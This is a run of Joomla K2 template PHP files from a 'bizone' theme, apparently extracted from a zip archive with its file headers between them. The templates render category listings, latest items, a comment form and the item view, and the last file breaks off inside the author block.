<div id="k2Container" class="itemListView<?php if($this->params->get('pageclass_sfx')) echo ' '.$this->params->get('pageclass_sfx'); ?>">

	<?php if($this->params->get('show_page_title')): ?>
	<!-- Page title -->
	<div class="componentheading<?php echo $this->params->get('pageclass_sfx')?>">
		<?php echo $this->escape($this->params->get('page_title')); ?>
	</div>
	<?php endif; ?>

	<?php if($this->params->get('catFeedIcon')): ?>
	<!-- RSS feed icon -->
	<div class="k2FeedIcon">
		<a href="<?php echo $this->feed; ?>" title="<?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?>">
			<span><?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?></span>
		</a>
		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<?php if(isset($this->category) || ( $this->params->get('subCategories') && isset($this->subCategories) && count($this->subCategories) )): ?>
	<!-- Blocks for current category and subcategories -->
	<div class="itemListCategoriesBlock">

		<?php if(isset($this->category) && ( $this->params->get('catImage') || $this->params->get('catTitle') || $this->params->get('catDescription') || $this->category->event->K2CategoryDisplay )): ?>
		<!-- Category block -->
		<div class="itemListCategory">

			<?php if(isset($this->addLink)): ?>
			<!-- Item add link -->
			<span class="catItemAddLink">
				<a data-k2-modal="edit" href="<?php echo $this->addLink; ?>">
					<?php echo JText::_('K2_ADD_A_NEW_ITEM_IN_THIS_CATEGORY'); ?>
				</a>
			</span>
			<?php endif; ?>

			<?php if($this->params->get('catImage') && $this->category->image): ?>
			<!-- Category image -->
			<img alt="<?php echo K2HelperUtilities::cleanHtml($this->category->name); ?>" src="<?php echo $this->category->image; ?>" style="width:<?php echo $this->params->get('catImageWidth'); ?>px; height:auto;" />
			<?php endif; ?>

			<?php if($this->params->get('catTitle')): ?>
			<!-- Category title -->
			<h2><?php echo $this->category->name; ?><?php if($this->params->get('catTitleItemCounter')) echo ' ('.$this->pagination->total.')'; ?></h2>
			<?php endif; ?>

			<?php if($this->params->get('catDescription')): ?>
			<!-- Category description -->
			<div><?php echo $this->category->description; ?></div>
			<?php endif; ?>

			<!-- K2 Plugins: K2CategoryDisplay -->
			<?php echo $this->category->event->K2CategoryDisplay; ?>

			<div class="clr"></div>
		</div>
		<?php endif; ?>

		<?php if($this->params->get('subCategories') && isset($this->subCategories) && count($this->subCategories)): ?>
		<!-- Subcategories -->
		<div class="itemListSubCategories">
			<h3><?php echo JText::_('K2_CHILDREN_CATEGORIES'); ?></h3>

			<?php foreach($this->subCategories as $key=>$subCategory): ?>

			<?php
			// Define a CSS class for the last container on each row
			if((($key+1)%($this->params->get('subCatColumns'))==0))
				$lastContainer= ' subCategoryContainerLast';
			else
				$lastContainer='';
			?>

			<div class="subCategoryContainer<?php echo $lastContainer; ?>"<?php echo (count($this->subCategories)==1) ? '' : ' style="width:'.number_format(100/$this->params->get('subCatColumns'), 1).'%;"'; ?>>
				<div class="subCategory">
					<?php if($this->params->get('subCatImage') && $subCategory->image): ?>
					<!-- Subcategory image -->
					<a class="subCategoryImage" href="<?php echo $subCategory->link; ?>">
						<img alt="<?php echo K2HelperUtilities::cleanHtml($subCategory->name); ?>" src="<?php echo $subCategory->image; ?>" />
					</a>
					<?php endif; ?>

					<?php if($this->params->get('subCatTitle')): ?>
					<!-- Subcategory title -->
					<h2>
						<a href="<?php echo $subCategory->link; ?>">
							<?php echo $subCategory->name; ?><?php if($this->params->get('subCatTitleItemCounter')) echo ' ('.$subCategory->numOfItems.')'; ?>
						</a>
					</h2>
					<?php endif; ?>

					<?php if($this->params->get('subCatDescription')): ?>
					<!-- Subcategory description -->
					<div><?php echo $subCategory->description; ?></div>
					<?php endif; ?>

					<!-- Subcategory more... -->
					<a class="subCategoryMore" href="<?php echo $subCategory->link; ?>">
						<?php echo JText::_('K2_VIEW_ITEMS'); ?>
					</a>

					<div class="clr"></div>
				</div>
			</div>
			<?php if(($key+1)%($this->params->get('subCatColumns'))==0): ?>
			<div class="clr"></div>
			<?php endif; ?>
			<?php endforeach; ?>

			<div class="clr"></div>
		</div>
		<?php endif; ?>

	</div>
	<?php endif; ?>

	<?php if((isset($this->leading) || isset($this->primary) || isset($this->secondary) || isset($this->links)) && (count($this->leading) || count($this->primary) || count($this->secondary) || count($this->links))): ?>
	<!-- Item list -->
	<div class="itemList">

		<?php if(isset($this->leading) && count($this->leading)): ?>
		<!-- Leading items -->
		<div id="itemListLeading">
			<?php foreach($this->leading as $key=>$item): ?>

			<?php
			// Define a CSS class for the last container on each row
			if((($key+1)%($this->params->get('num_leading_columns'))==0) || count($this->leading)<$this->params->get('num_leading_columns'))
				$lastContainer= ' itemContainerLast';
			else
				$lastContainer='';
			?>

			<div class="itemContainer<?php echo $lastContainer; ?>"<?php echo (count($this->leading)==1) ? '' : ' style="width:'.number_format(100/$this->params->get('num_leading_columns'), 1).'%;"'; ?>>
				<?php
					// Load category_item.php by default
					$this->item = $item;
					echo $this->loadTemplate('item');
				?>
			</div>
			<?php if(($key+1)%($this->params->get('num_leading_columns'))==0): ?>
			<div class="clr"></div>
			<?php endif; ?>
			<?php endforeach; ?>
			<div class="clr"></div>
		</div>
		<?php endif; ?>

		<?php if(isset($this->primary) && count($this->primary)): ?>
		<!-- Primary items -->
		<div id="itemListPrimary">
			<?php foreach($this->primary as $key=>$item): ?>

			<?php
			// Define a CSS class for the last container on each row
			if( (($key+1)%($this->params->get('num_primary_columns'))==0) || count($this->primary)<$this->params->get('num_primary_columns') )
				$lastContainer= ' itemContainerLast';
			else
				$lastContainer='';
			?>

			<div class="itemContainer<?php echo $lastContainer; ?>"<?php echo (count($this->primary)==1) ? '' : ' style="width:'.number_format(100/$this->params->get('num_primary_columns'), 1).'%;"'; ?>>
				<?php
					// Load category_item.php by default
					$this->item = $item;
					echo $this->loadTemplate('item');
				?>
			</div>
			<?php if(($key+1)%($this->params->get('num_primary_columns'))==0): ?>
			<div class="clr"></div>
			<?php endif; ?>
			<?php endforeach; ?>
			<div class="clr"></div>
		</div>
		<?php endif; ?>

		<?php if(isset($this->secondary) && count($this->secondary)): ?>
		<!-- Secondary items -->
		<div id="itemListSecondary">
			<?php foreach($this->secondary as $key=>$item): ?>

			<?php
			// Define a CSS class for the last container on each row
			if( (($key+1)%($this->params->get('num_secondary_columns'))==0) || count($this->secondary)<$this->params->get('num_secondary_columns') )
				$lastContainer= ' itemContainerLast';
			else
				$lastContainer='';
			?>

			<div class="itemContainer<?php echo $lastContainer; ?>"<?php echo (count($this->secondary)==1) ? '' : ' style="width:'.number_format(100/$this->params->get('num_secondary_columns'), 1).'%;"'; ?>>
				<?php
					// Load category_item.php by default
					$this->item = $item;
					echo $this->loadTemplate('item');
				?>
			</div>
			<?php if(($key+1)%($this->params->get('num_secondary_columns'))==0): ?>
			<div class="clr"></div>
			<?php endif; ?>
			<?php endforeach; ?>
			<div class="clr"></div>
		</div>
		<?php endif; ?>

		<?php if(isset($this->links) && count($this->links)): ?>
		<!-- Link items -->
		<div id="itemListLinks">
			<h4><?php echo JText::_('K2_MORE'); ?></h4>
			<?php foreach($this->links as $key=>$item): ?>

			<?php
			// Define a CSS class for the last container on each row
			if((($key+1)%($this->params->get('num_links_columns'))==0) || count($this->links)<$this->params->get('num_links_columns'))
				$lastContainer= ' itemContainerLast';
			else
				$lastContainer='';
			?>

			<div class="itemContainer<?php echo $lastContainer; ?>"<?php echo (count($this->links)==1) ? '' : ' style="width:'.number_format(100/$this->params->get('num_links_columns'), 1).'%;"'; ?>>
				<?php
					// Load category_item.php by default
					$this->item = $item;
					echo $this->loadTemplate('item');
				?>
			</div>
			<?php if(($key+1)%($this->params->get('num_links_columns'))==0): ?>
			<div class="clr"></div>
			<?php endif; ?>
			<?php endforeach; ?>
			<div class="clr"></div>
		</div>
		<?php endif; ?>

	</div>

	<!-- Pagination -->
	<?php if($this->pagination->getPagesLinks()): ?>
    <div class="row pagination-list">
	    <div class="col-md-12">
	    	<div class="morepost-wrap">
	    		<?php if($this->params->get('catPagination')) echo $this->pagination->getPagesLinks(); ?>
	    	</div>
	    </div>
    </div>
	<?php endif; ?>

	<?php endif; ?>
</div>

<!-- End K2 Category Layout -->
PK!�uL��4bizone/html/com_k2/templates/default/latest_item.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<!-- Start K2 Item Layout -->
<div class="latestItemView">

	<!-- Plugins: BeforeDisplay -->
	<?php echo $this->item->event->BeforeDisplay; ?>

	<!-- K2 Plugins: K2BeforeDisplay -->
	<?php echo $this->item->event->K2BeforeDisplay; ?>

	<div class="latestItemHeader">
	  <?php if($this->item->params->get('latestItemTitle')): ?>
	  <!-- Item title -->
	  <h2 class="latestItemTitle">
	  	<?php if ($this->item->params->get('latestItemTitleLinked')): ?>
			<a href="<?php echo $this->item->link; ?>">
	  		<?php echo $this->item->title; ?>
	  	</a>
	  	<?php else: ?>
	  	<?php echo $this->item->title; ?>
	  	<?php endif; ?>
	  </h2>
	  <?php endif; ?>
  </div>
  
	<?php if($this->item->params->get('latestItemDateCreated')): ?>
	<!-- Date created -->
	<span class="latestItemDateCreated">
		<?php echo JHTML::_('date', $this->item->created , JText::_('K2_DATE_FORMAT_LC2')); ?>
	</span>
	<?php endif; ?>

  <!-- Plugins: AfterDisplayTitle -->
  <?php echo $this->item->event->AfterDisplayTitle; ?>

  <!-- K2 Plugins: K2AfterDisplayTitle -->
  <?php echo $this->item->event->K2AfterDisplayTitle; ?>

  <div class="latestItemBody">

	  <!-- Plugins: BeforeDisplayContent -->
	  <?php echo $this->item->event->BeforeDisplayContent; ?>

	  <!-- K2 Plugins: K2BeforeDisplayContent -->
	  <?php echo $this->item->event->K2BeforeDisplayContent; ?>

	  <?php if($this->item->params->get('latestItemImage') && !empty($this->item->image)): ?>
	  <!-- Item Image -->
	  <div class="latestItemImageBlock">
		  <span class="latestItemImage">
		    <a href="<?php echo $this->item->link; ?>" title="<?php if(!empty($this->item->image_caption)) echo K2HelperUtilities::cleanHtml($this->item->image_caption); else echo K2HelperUtilities::cleanHtml($this->item->title); ?>">
		    	<img src="<?php echo $this->item->image; ?>" alt="<?php if(!empty($this->item->image_caption)) echo K2HelperUtilities::cleanHtml($this->item->image_caption); else echo K2HelperUtilities::cleanHtml($this->item->title); ?>" style="width:<?php echo $this->item->imageWidth; ?>px;height:auto;" />
		    </a>
		  </span>
		  <div class="clr"></div>
	  </div>
	  <?php endif; ?>

	  <?php if($this->item->params->get('latestItemIntroText')): ?>
	  <!-- Item introtext -->
	  <div class="latestItemIntroText">
	  	<?php echo $this->item->introtext; ?>
	  </div>
	  <?php endif; ?>

		<div class="clr"></div>

	  <!-- Plugins: AfterDisplayContent -->
	  <?php echo $this->item->event->AfterDisplayContent; ?>

	  <!-- K2 Plugins: K2AfterDisplayContent -->
	  <?php echo $this->item->event->K2AfterDisplayContent; ?>

	  <div class="clr"></div>
  </div>

  <?php if($this->item->params->get('latestItemCategory') || $this->item->params->get('latestItemTags')): ?>
  <div class="latestItemLinks">

		<?php if($this->item->params->get('latestItemCategory')): ?>
		<!-- Item category name -->
		<div class="latestItemCategory">
			<span><?php echo JText::_('K2_PUBLISHED_IN'); ?></span>
			<a href="<?php echo $this->item->category->link; ?>"><?php echo $this->item->category->name; ?></a>
		</div>
		<?php endif; ?>

	  <?php if($this->item->params->get('latestItemTags') && count($this->item->tags)): ?>
	  <!-- Item tags -->
	  <div class="latestItemTagsBlock">
		  <span><?php echo JText::_('K2_TAGGED_UNDER'); ?></span>
		  <ul class="latestItemTags">
		    <?php foreach ($this->item->tags as $tag): ?>
		    <li><a href="<?php echo $tag->link; ?>"><?php echo $tag->name; ?></a></li>
		    <?php endforeach; ?>
		  </ul>
		  <div class="clr"></div>
	  </div>
	  <?php endif; ?>

		<div class="clr"></div>
  </div>
  <?php endif; ?>

	<div class="clr"></div>

  <?php if($this->params->get('latestItemVideo') && !empty($this->item->video)): ?>
  <!-- Item video -->
  <div class="latestItemVideoBlock">
  	<h3><?php echo JText::_('K2_RELATED_VIDEO'); ?></h3>
	  <span class="latestItemVideo<?php if($this->item->videoType=='embedded'): ?> embedded<?php endif; ?>"><?php echo $this->item->video; ?></span>
  </div>
  <?php endif; ?>

	<?php if($this->item->params->get('latestItemCommentsAnchor') && ( ($this->item->params->get('comments') == '2' && !$this->user->guest) || ($this->item->params->get('comments') == '1')) ): ?>
	<!-- Anchor link to comments below -->
	<div class="latestItemCommentsLink">
		<?php if(!empty($this->item->event->K2CommentsCounter)): ?>
			<!-- K2 Plugins: K2CommentsCounter -->
			<?php echo $this->item->event->K2CommentsCounter; ?>
		<?php else: ?>
			<?php if($this->item->numOfComments > 0): ?>
			<a href="<?php echo $this->item->link; ?>#itemCommentsAnchor">
				<?php echo $this->item->numOfComments; ?> <?php echo ($this->item->numOfComments>1) ? JText::_('K2_COMMENTS') : JText::_('K2_COMMENT'); ?>
			</a>
			<?php else: ?>
			<a href="<?php echo $this->item->link; ?>#itemCommentsAnchor">
				<?php echo JText::_('K2_BE_THE_FIRST_TO_COMMENT'); ?>
			</a>
			<?php endif; ?>
		<?php endif; ?>
	</div>
	<?php endif; ?>

	<?php if ($this->item->params->get('latestItemReadMore')): ?>
	<!-- Item "read more..." link -->
	<div class="latestItemReadMore">
		<a class="k2ReadMore" href="<?php echo $this->item->link; ?>">
			<?php echo JText::_('K2_READ_MORE'); ?>
		</a>
	</div>
	<?php endif; ?>

	<div class="clr"></div>

  <!-- Plugins: AfterDisplay -->
  <?php echo $this->item->event->AfterDisplay; ?>

  <!-- K2 Plugins: K2AfterDisplay -->
  <?php echo $this->item->event->K2AfterDisplay; ?>

	<div class="clr"></div>
</div>
<!-- End K2 Item Layout -->
PK!���P��;bizone/html/com_k2/templates/default/item_comments_form.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>
<div class="post-comment"> 
    <h3><?php echo JText::_('K2_LEAVE_A_COMMENT') ?></h3>
    <?php if($this->params->get('commentsFormNotes')): ?>
    <p class="itemCommentsFormNotes">
        <?php if($this->params->get('commentsFormNotesText')): ?>
        <?php echo nl2br($this->params->get('commentsFormNotesText')); ?>
        <?php else: ?>
        <?php echo JText::_('K2_COMMENT_FORM_NOTES') ?>
        <?php endif; ?>
    </p>
    <?php endif; ?>
    <form action="<?php echo JURI::root(true); ?>/index.php" method="post" id="comment-form" class="form-inline submit-form form-validate">
        <div class="row">
            <div class="col-md-4 col-sm-12 form-group">
                <input class="form-control inputbox" type="text" name="userName" id="userName" placeholder="<?php echo JText::_('K2_ENTER_YOUR_NAME'); ?>" />
            </div>
            <div class="col-md-4 col-sm-12 form-group">
                <input type="text" id="commentEmail" class="inputbox form-control" name="commentEmail"  placeholder="<?php echo JText::_('K2_ENTER_YOUR_EMAIL_ADDRESS'); ?>">
            </div>
            <div class="col-md-4 col-sm-12 form-group">
                <input class="inputbox form-control" type="text" name="commentURL" id="commentURL" placeholder="<?php echo JText::_('K2_ENTER_YOUR_SITE_URL'); ?>" />
            </div>
        </div>
        <div class="row comment-message">
            <div class="col-md-12 col-sm-12 form-group">
                <textarea name="commentText" id="commentText" class="form-control" placeholder="<?php echo JText::_('K2_ENTER_YOUR_MESSAGE_HERE'); ?>';"></textarea>
            </div>
        </div>

        <?php if($this->params->get('recaptcha') && ($this->user->guest || $this->params->get('recaptchaForRegistered', 1))): ?>
            <?php if(!$this->params->get('recaptchaV2')): ?>
            <label class="formRecaptcha"><?php echo JText::_('K2_ENTER_THE_TWO_WORDS_YOU_SEE_BELOW'); ?></label>
            <?php endif; ?>
            <div id="recaptcha" class="<?php echo $this->recaptchaClass; ?>"></div>
            <?php endif; ?>

            <input type="submit" class="hvr-bounce-to-bottom" id="submitCommentButton" value="<?php echo JText::_('K2_SUBMIT_COMMENT'); ?>" />

            <span id="formLog"></span>

            <input type="hidden" name="option" value="com_k2" />
            <input type="hidden" name="view" value="item" />
            <input type="hidden" name="task" value="comment" />
            <input type="hidden" name="itemID" value="<?php echo JRequest::getInt('id'); ?>" />
            <?php echo JHTML::_('form.token'); ?>
        </form>
    </form>
</div>PK!��<��c�c-bizone/html/com_k2/templates/default/item.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<?php if(JRequest::getInt('print')==1): ?>
<!-- Print button at the top of the print page only -->
<a class="itemPrintThisPage" rel="nofollow" href="#" onclick="window.print();return false;">
	<span><?php echo JText::_('K2_PRINT_THIS_PAGE'); ?></span>
</a>
<?php endif; ?>

<!-- Start K2 Item Layout -->
<span id="startOfPageId<?php echo JRequest::getInt('id'); ?>"></span>

<div id="k2Container" class="blog-item itemView<?php echo ($this->item->featured) ? ' itemIsFeatured' : ''; ?><?php if($this->item->params->get('pageclass_sfx')) echo ' '.$this->item->params->get('pageclass_sfx'); ?>">

	<!-- Plugins: BeforeDisplay -->
	<?php echo $this->item->event->BeforeDisplay; ?>

	<!-- K2 Plugins: K2BeforeDisplay -->
	<?php echo $this->item->event->K2BeforeDisplay; ?>
	<?php if($this->item->params->get('itemImage') && !empty($this->item->image)): ?>
	<div class="blog-img">
    	<img class="img-responsive" src="<?php echo $this->item->image; ?>" alt="<?php echo $this->item->title; ?>" />
    </div>
    <?php endif; ?>
    <div class="blog-content">
        <?php if($this->item->params->get('itemTitle')): ?>
        <h3><?php echo $this->item->title; ?></h3>
        <?php endif; ?>
        <ul class="blog-author">
            <?php if($this->item->params->get('itemAuthor')): ?>
            <li><a href="<?php echo $this->item->link; ?>"><i class="fa fa-user"></i><?php echo $this->item->author->name; ?></a></li>
            <?php endif; ?>
            <?php if($this->item->params->get('itemCommentsAnchor') && $this->item->params->get('itemComments') && ( ($this->item->params->get('comments') == '2' && !$this->user->guest) || ($this->item->params->get('comments') == '1')) ): ?>
            <li><a href="<?php echo $this->item->link; ?>"><i class="fa fa-comment-o"></i><?php echo $this->item->numOfComments; ?> <?php echo JText::_('K2_COMMENTS'); ?></a></li>
            <?php endif; ?>
            <?php if($this->item->params->get('itemDateCreated')): 
                $date = new DateTime($this->item->created);
            ?>
            <li><a href="<?php echo $this->item->link; ?>"><i class="fa fa-clock-o"></i><?php echo $date->format('m F, Y'); ?></a></li>
            <?php endif; ?>                            
        </ul>
        <?php if(!empty($this->item->fulltext)): ?>
                <?php if($this->item->params->get('itemFullText')): ?>
                <!-- Item fulltext -->
                <div class="itemFullText">
                    <?php echo $this->item->fulltext; ?>
                </div>
                <?php endif; ?>

                <?php else: ?>

                <!-- Item text -->
                <div class="itemFullText">
                    <?php echo $this->item->introtext; ?>
                </div>

        <?php endif; ?>
    </div>

	<!-- Plugins: AfterDisplayTitle -->
	<?php echo $this->item->event->AfterDisplayTitle; ?>

	<!-- K2 Plugins: K2AfterDisplayTitle -->
	<?php echo $this->item->event->K2AfterDisplayTitle; ?>

	<?php if(
		$this->item->params->get('itemFontResizer') ||
		$this->item->params->get('itemPrintButton') ||
		$this->item->params->get('itemEmailButton') ||
		$this->item->params->get('itemSocialButton') ||
		($this->item->params->get('itemVideoAnchor') && !empty($this->item->video)) ||
		($this->item->params->get('itemImageGalleryAnchor') && !empty($this->item->gallery))
	): ?>
	<div class="itemToolbar">
		<ul>
			<?php if($this->item->params->get('itemFontResizer')): ?>
			<!-- Font Resizer -->
			<li>
				<span class="itemTextResizerTitle"><?php echo JText::_('K2_FONT_SIZE'); ?></span>
				<a href="#" id="fontDecrease">
					<span><?php echo JText::_('K2_DECREASE_FONT_SIZE'); ?></span>
				</a>
				<a href="#" id="fontIncrease">
					<span><?php echo JText::_('K2_INCREASE_FONT_SIZE'); ?></span>
				</a>
			</li>
			<?php endif; ?>

			<?php if($this->item->params->get('itemPrintButton') && !JRequest::getInt('print')): ?>
			<!-- Print Button -->
			<li>
				<a class="itemPrintLink" rel="nofollow" href="<?php echo $this->item->printLink; ?>" onclick="window.open(this.href,'printWindow','width=900,height=600,location=no,menubar=no,resizable=yes,scrollbars=yes'); return false;">
					<span><?php echo JText::_('K2_PRINT'); ?></span>
				</a>
			</li>
			<?php endif; ?>

			<?php if($this->item->params->get('itemEmailButton') && !JRequest::getInt('print')): ?>
			<!-- Email Button -->
			<li>
				<a class="itemEmailLink" rel="nofollow" href="<?php echo $this->item->emailLink; ?>" onclick="window.open(this.href,'emailWindow','width=400,height=350,location=no,menubar=no,resizable=no,scrollbars=no'); return false;">
					<span><?php echo JText::_('K2_EMAIL'); ?></span>
				</a>
			</li>
			<?php endif; ?>

			<?php if($this->item->params->get('itemSocialButton') && !is_null($this->item->params->get('socialButtonCode', NULL))): ?>
			<!-- Item Social Button -->
			<li>
				<?php echo $this->item->params->get('socialButtonCode'); ?>
			</li>
			<?php endif; ?>

			<?php if($this->item->params->get('itemVideoAnchor') && !empty($this->item->video)): ?>
			<!-- Anchor link to item video below - if it exists -->
			<li>
				<a class="itemVideoLink k2Anchor" href="<?php echo $this->item->link; ?>#itemVideoAnchor"><?php echo JText::_('K2_MEDIA'); ?></a>
			</li>
			<?php endif; ?>

			<?php if($this->item->params->get('itemImageGalleryAnchor') && !empty($this->item->gallery)): ?>
			<!-- Anchor link to item image gallery below - if it exists -->
			<li>
				<a class="itemImageGalleryLink k2Anchor" href="<?php echo $this->item->link; ?>#itemImageGalleryAnchor"><?php echo JText::_('K2_IMAGE_GALLERY'); ?></a>
			</li>
			<?php endif; ?>
		</ul>
		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<?php if($this->item->params->get('itemRating')): ?>
	<!-- Item Rating -->
	<div class="itemRatingBlock">
		<span><?php echo JText::_('K2_RATE_THIS_ITEM'); ?></span>
		<div class="itemRatingForm">
			<ul class="itemRatingList">
				<li class="itemCurrentRating" id="itemCurrentRating<?php echo $this->item->id; ?>" style="width:<?php echo $this->item->votingPercentage; ?>%;"></li>
				<li><a href="#" data-id="<?php echo $this->item->id; ?>" title="<?php echo JText::_('K2_1_STAR_OUT_OF_5'); ?>" class="one-star">1</a></li>
				<li><a href="#" data-id="<?php echo $this->item->id; ?>" title="<?php echo JText::_('K2_2_STARS_OUT_OF_5'); ?>" class="two-stars">2</a></li>
				<li><a href="#" data-id="<?php echo $this->item->id; ?>" title="<?php echo JText::_('K2_3_STARS_OUT_OF_5'); ?>" class="three-stars">3</a></li>
				<li><a href="#" data-id="<?php echo $this->item->id; ?>" title="<?php echo JText::_('K2_4_STARS_OUT_OF_5'); ?>" class="four-stars">4</a></li>
				<li><a href="#" data-id="<?php echo $this->item->id; ?>" title="<?php echo JText::_('K2_5_STARS_OUT_OF_5'); ?>" class="five-stars">5</a></li>
			</ul>
			<div id="itemRatingLog<?php echo $this->item->id; ?>" class="itemRatingLog"><?php echo $this->item->numOfvotes; ?></div>
			<div class="clr"></div>
		</div>
		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<div class="itemBody">

		<!-- Plugins: BeforeDisplayContent -->
		<?php echo $this->item->event->BeforeDisplayContent; ?>

		<!-- K2 Plugins: K2BeforeDisplayContent -->
		<?php echo $this->item->event->K2BeforeDisplayContent; ?>

		<?php if($this->item->params->get('itemExtraFields') && count($this->item->extra_fields)): ?>
		<!-- Item extra fields -->
		<div class="itemExtraFields">
			<h3><?php echo JText::_('K2_ADDITIONAL_INFO'); ?></h3>
			<ul>
				<?php foreach ($this->item->extra_fields as $key=>$extraField): ?>
				<?php if($extraField->value != ''): ?>
				<li class="<?php echo ($key%2) ? "odd" : "even"; ?> type<?php echo ucfirst($extraField->type); ?> group<?php echo $extraField->group; ?>">
					<?php if($extraField->type == 'header'): ?>
					<h4 class="itemExtraFieldsHeader"><?php echo $extraField->name; ?></h4>
					<?php else: ?>
					<span class="itemExtraFieldsLabel"><?php echo $extraField->name; ?>:</span>
					<span class="itemExtraFieldsValue"><?php echo $extraField->value; ?></span>
					<?php endif; ?>
				</li>
				<?php endif; ?>
				<?php endforeach; ?>
			</ul>
			<div class="clr"></div>
		</div>
		<?php endif; ?>

		<?php if($this->item->params->get('itemHits') || ($this->item->params->get('itemDateModified') && intval($this->item->modified)!=0)): ?>
		<div class="itemContentFooter">

			<?php if($this->item->params->get('itemHits')): ?>
			<!-- Item Hits -->
			<span class="itemHits">
				<?php echo JText::_('K2_READ'); ?> <b><?php echo $this->item->hits; ?></b> <?php echo JText::_('K2_TIMES'); ?>
			</span>
			<?php endif; ?>

			<?php if($this->item->params->get('itemDateModified') && intval($this->item->modified)!=0): ?>
			<!-- Item date modified -->
			<span class="itemDateModified">
				<?php echo JText::_('K2_LAST_MODIFIED_ON'); ?> <?php echo JHTML::_('date', $this->item->modified, JText::_('K2_DATE_FORMAT_LC2')); ?>
			</span>
			<?php endif; ?>

			<div class="clr"></div>
		</div>
		<?php endif; ?>

		<!-- Plugins: AfterDisplayContent -->
		<?php echo $this->item->event->AfterDisplayContent; ?>

		<!-- K2 Plugins: K2AfterDisplayContent -->
		<?php echo $this->item->event->K2AfterDisplayContent; ?>

		<div class="clr"></div>

	</div>

    <div class="post-tag clearfix"> 
        <?php if($this->item->params->get('itemTags') && count($this->item->tags)): ?>
        <!-- Item tags -->                        
        <ul class="tag-cloud pull-left">
            <?php foreach ($this->item->tags as $tag): ?>
            <li><a href="<?php echo $tag->link; ?>"><?php echo $tag->name; ?></a></li>
            <?php endforeach; ?>
        </ul>
        <?php endif; ?>
        <ul class="blue-social social-link pull-right">
        	<?php if($this->item->params->get('itemFacebookButton',1)): ?>
            <li><a href="#" class="facebook text-center" data-social='{"type":"facebook", "url":"<?php echo $this->item->absoluteURL; ?>", "text": "<?php echo $this->item->title; ?>"}'><i class="fa fa-facebook"></i><span></span></a></li>
            <?php endif; ?>
            <?php if($this->item->params->get('itemTwitterButton',1)): ?>
            <li><a href="#" class="twitter text-center" data-social='{"type":"twitter", "url":"<?php echo $this->item->absoluteURL; ?>", "text": "<?php echo $this->item->title; ?>"}'><i class="fa fa-twitter"></i><span></span></a></li>
            <?php endif; ?>
            <?php if($this->item->params->get('itemGooglePlusOneButton',1)): ?>
            <li><a href="#" class="plusone text-center" data-social='{"type":"plusone", "url":"<?php echo $this->item->absoluteURL; ?>", "text": "<?php echo $this->item->title; ?>"}'><i class="fa fa-google"></i><span></span></a></li>
            <?php endif; ?>
        </ul>
    </div>

	<?php if(
		$this->item->params->get('itemCategory') ||
		$this->item->params->get('itemTags') ||
		$this->item->params->get('itemAttachments')
	): ?>
	<div class="itemLinks">

		<?php if($this->item->params->get('itemCategory')): ?>
		<!-- Item category -->
		<div class="itemCategory">
			<span><?php echo JText::_('K2_PUBLISHED_IN'); ?></span>
			<a href="<?php echo $this->item->category->link; ?>"><?php echo $this->item->category->name; ?></a>
		</div>
		<?php endif; ?>

		<?php if($this->item->params->get('itemAttachments') && count($this->item->attachments)): ?>
		<!-- Item attachments -->
		<div class="itemAttachmentsBlock">
			<span><?php echo JText::_('K2_DOWNLOAD_ATTACHMENTS'); ?></span>
			<ul class="itemAttachments">
				<?php foreach ($this->item->attachments as $attachment): ?>
				<li>
					<a title="<?php echo K2HelperUtilities::cleanHtml($attachment->titleAttribute); ?>" href="<?php echo $attachment->link; ?>"><?php echo $attachment->title; ?></a>
					<?php if($this->item->params->get('itemAttachmentsCounter')): ?>
					<span>(<?php echo $attachment->hits; ?> <?php echo ($attachment->hits==1) ? JText::_('K2_DOWNLOAD') : JText::_('K2_DOWNLOADS'); ?>)</span>
					<?php endif; ?>
				</li>
				<?php endforeach; ?>
			</ul>
		</div>
		<?php endif; ?>

		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<?php if($this->item->params->get('itemAuthorBlock') && empty($this->item->created_by_alias)): ?>
	<!-- Author Block -->
	<div class="itemAuthorBlock">
		<?php if($this->item->params->get('itemAuthorImage') && !empty($this->item->author->avatar)): ?>
		<img class="itemAuthorAvatar" src="<?php echo $this->item->author->avatar; ?>" alt="<?php echo K2HelperUtilities::cleanHtml($this->item->author->name); ?>" />
		<?php endif; ?>

		<div class="itemAuthorDetails">
			<h3 class="itemAuthorName">
				<a rel="author" href="<?php echo $this->item->author->link; ?>"><?php echo $this->item->author->name; ?></a>
			</h3>

			<?php if($this->item->params->get('itemAuthorDescription') && !empty($this->item->author->profile->description)): ?>
			<p><?php echo $this->item->author->profile->description; ?></p>
			<?php endif; ?>

			<?php if($this->item->params->get('itemAuthorURL') && !empty($this->item->author->profile->url)): ?>
			<span class="itemAuthorUrl"><i class="k2icon-globe"></i> <a rel="me" href="<?php echo $this->item->author->profile->url; ?>" target="_blank"><?php echo str_replace('http://','',$this->item->author->profile->url); ?></a></span>
			<?php endif; ?>
			
			<?php if($this->item->params->get('itemAuthorURL') && !empty($this->item->author->profile->url) && $this->item->params->get('itemAuthorEmail')): ?>
			<span class="k2HorizontalSep">|</span>
			<?php endif; ?>
			
			<?php if($this->item->params->get('itemAuthorEmail')): ?>
			<span class="itemAuthorEmail"><i class="k2icon-envelope"></i> <?php echo JHTML::_('Email.cloak', $this->item->author->email); ?></span>
			<?php endif; ?>

			<div class="clr"></div>

			<!-- K2 Plugins: K2UserDisplay -->
			<?php echo $this->item->event->K2UserDisplay; ?>

			<div class="clr"></div>
